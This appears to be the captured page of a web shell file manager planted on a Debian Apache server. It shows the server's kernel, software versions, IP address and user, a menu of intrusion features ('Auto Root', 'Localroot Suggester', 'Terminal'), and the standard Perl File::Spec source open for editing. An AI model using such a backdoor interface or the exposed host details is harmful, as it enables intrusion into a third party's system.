Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.119
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
x86_64-linux-gnu /
perl-base /
File /
Delete
Unzip
Name
Size
Permission
Date
Action
Spec
[ DIR ]
drwxrwxrwx
2020-08-24 23:41
Basename.pm
5.3
KB
-rwxrwxrwx
2020-06-20 19:33
Glob.pm
1.79
KB
-rwxrwxrwx
2020-06-20 19:33
Path.pm
18.06
KB
-rwxrwxrwx
2020-06-20 19:33
Spec.pm
622
B
-rwxrwxrwx
2020-06-20 19:33
Temp.pm
45.83
KB
-rwxrwxrwx
2020-06-20 19:33
Save
Rename
package File::Spec; use strict; use vars qw(@ISA $VERSION); $VERSION = '3.63_01'; $VERSION =~ tr/_//d; my %module = (MacOS => 'Mac', MSWin32 => 'Win32', os2 => 'OS2', VMS => 'VMS', epoc => 'Epoc', NetWare => 'Win32', # Yes, File::Spec::Win32 works on NetWare. symbian => 'Win32', # Yes, File::Spec::Win32 works on symbian. dos => 'OS2', # Yes, File::Spec::OS2 works on DJGPP. cygwin => 'Cygwin', amigaos => 'AmigaOS'); my $module = $module{$^O} || 'Unix'; require "File/Spec/$module.pm"; @ISA = ("File::Spec::$module"); 1; __END__